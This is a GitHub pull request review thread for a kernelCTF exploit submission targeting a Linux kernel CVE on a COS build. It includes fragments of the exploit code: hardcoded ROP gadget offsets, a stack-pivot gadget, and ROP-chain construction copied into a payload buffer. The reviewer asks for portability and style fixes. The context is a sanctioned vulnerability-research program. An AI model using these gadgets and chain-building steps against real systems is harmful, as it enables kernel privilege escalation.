Add kernelCTF CVE-2026-23392_cos#370
Conversation
| setup_target(target); | ||
| kxdb.AddTarget(target); | ||
|
|
||
| target = kxdb.GetTarget("kernelctf", "cos-121-18867.381.45"); |
There was a problem hiding this comment.
Please fix the usage of kernelXDK.
While you're adding missing structs and offsets in correct way, you should not lock the target to "cos-121-18867.381.45", you should run autodetect instead. The same way as in Step 8 here https://xdk.dev/libxdk/sample_exploit.html#hardcoded-sizes-and-offsets.
The current setup makes exploit unportable even after the missing structs and offsets are added to DB. With autodetect and missing structs added to DB (by kernelCTF team) we get portable exploit.
There was a problem hiding this comment.
Got it, I've updated it.
artmetla
added
the
kCTF: vuln OK
| target.AddSymbol("pop_rdx", 0x00170812); /* pop rdx ; ret */ | ||
| target.AddSymbol("push_rdi_pivot", 0x004d4e1b); /* push rdi; pop rsp; jmp __x86_return_thunk */ | ||
| target.AddSymbol("_copy_from_user", 0x009c01b0); | ||
| target.AddSymbol("msleep", 0x0027a4c0); |
There was a problem hiding this comment.
Please check RopActionId::MSLEEP and update ROP chain generation
There was a problem hiding this comment.
Got it, I've updated it.
| rop.Add(g_target->GetSymbolOffset("msleep"), true); | ||
|
|
||
| auto rop_data = rop.GetData(); | ||
| memcpy(p + rop_landing, rop_data.data(), rop_data.size()); |
There was a problem hiding this comment.
Please have a look at PayloadBuilder and Payload. An example could be https://github.com/google/kernel-research/blob/main/libxdk/samples/exp151/exploit.cpp
There was a problem hiding this comment.
Got it, I've updated it.
artmetla
removed
the
kCTF: vuln OK
| * Symbols: ROP gadgets + kernel variables | ||
| * These are offsets from kernel .text base (kbase). | ||
| */ | ||
| target.AddSymbol("pop_rdi", 0x00107e2d); /* pop rdi ; ret */ |
There was a problem hiding this comment.
This is not a symbol. This is gadget. So you should follow https://google.github.io/security-research/kernelctf/style_guide.html#rop-chains as it's impossible to utilise XDK's RopChain
There was a problem hiding this comment.
Got it, I've updated it.
|
@NLQuy Thanks for fixes |
artmetla
added
the
kCTF: vuln OK
2 participants
No description provided.